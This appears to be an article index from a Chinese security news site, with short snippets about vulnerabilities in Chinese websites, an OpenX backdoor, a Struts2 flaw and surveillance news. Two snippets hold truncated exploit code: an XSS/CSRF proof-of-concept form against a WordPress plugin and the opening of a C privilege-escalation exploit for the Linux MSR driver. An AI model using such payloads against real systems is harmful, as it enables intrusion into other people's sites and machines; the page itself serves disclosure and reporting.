文章列表
关于Openx最近这个后门的利用
昨晚耶稣发我的, 就研究了下, 支持2.8.10-2.10, 比较鸡肋, 引用一段原文吧..
江苏网络电视台(jstv.com)某分站 用户信息泄露漏洞
江苏网络电视台(jstv.com)某分站 用户信息泄露漏洞
新浪(sina.com)中医网 存储型XSS跨站漏洞
新浪(sina.com)中医网 存储型XSS跨站漏洞
黑客公布入侵丰田/福特汽车棱镜计划!
车云早就预告过,黑客即将可以入侵普锐斯和翼虎,黑客果然不是说笑的,现在他们来了!黑客公布入侵丰田/福特棱镜计划,绝密文件曝光 刚刚在美国拉斯维加斯闭幕的2013黑客大会(DefCon)上,人们不再将重点关注iOS 7完美越狱漏洞或者是GoogleChrome浏览器沙盒漏洞这类常规话题,反而是两个美国黑客的
WordPress HMS Testimonials 2.0.10 XSS / CSRF漏洞
原文地址:http://www.1337day.com/exploit/21090测试方法:Proof of Concept========================1. Testimonial<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew"> <input type="hidden" name="name" value="<script>alert('xss')</script>">
中国移动(10086.cn)某分站 最新struts2命令执行漏洞 腥风血雨之二十
中国移动(10086.cn)某分站 最新struts2命令执行漏洞 腥风血雨之二十
iOS存在重大漏洞 可绕开安全机制
【ChinaITLab】苹果的iOS被认为是最稳定和安全的平台,iPhone和iPad也成了世界各地移动移动设备用户的选择。尽管iOS是基于Unix内核,但它也并不是无坚不摧。不过,与恶意软件温床安卓平台相比,你似乎并没有听说iOS出现过向恶意软件大门敞开的致命缺陷。但很不幸的消息出现了,佐治亚理工学院信息安全
Linux内核MSR驱动程序权限提升漏洞
#define _GNU_SOURCE#include <stdio.h>#include <sched.h>#include <unistd.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <stdlib.h>#include <sys/time.h>#include <sys/resource.h>#include <sys/mman.h> #define SYSENTER_EIP_MSR 0x176 u_int64_t msr; unsigned
WSJ:FBI可远程激活Android及笔记本麦克风实现监听
【51CTO】上个月,人们还在疑惑NAS是否会将微软新一代Kinect技术使用到它们的监控项目中。现在,来自《华尔街日报》最新的报道称,其实,美国另一个联邦机构--FBI,早就有了可远程激活Android及笔记本麦克风并录制对话的能力。据悉,这一消息由一名美国前官员透露。他表示,无论是FBI还是谷歌,他们都
工信部治理黑客地下产业链
工信部发动一轮防范治理黑客地下产业链专项行动。在昨日公开的《工业和信息化部关于印发防范治理黑客地下产业链专项行动方案的通知》中,工信部称,为遏制黑客地下产业链蔓延,净化网络环境,保护用户和企业切身利益与财产安全,将于2013年8月至12月开展防范治理黑客地下产业链专项行动。在公布的行动
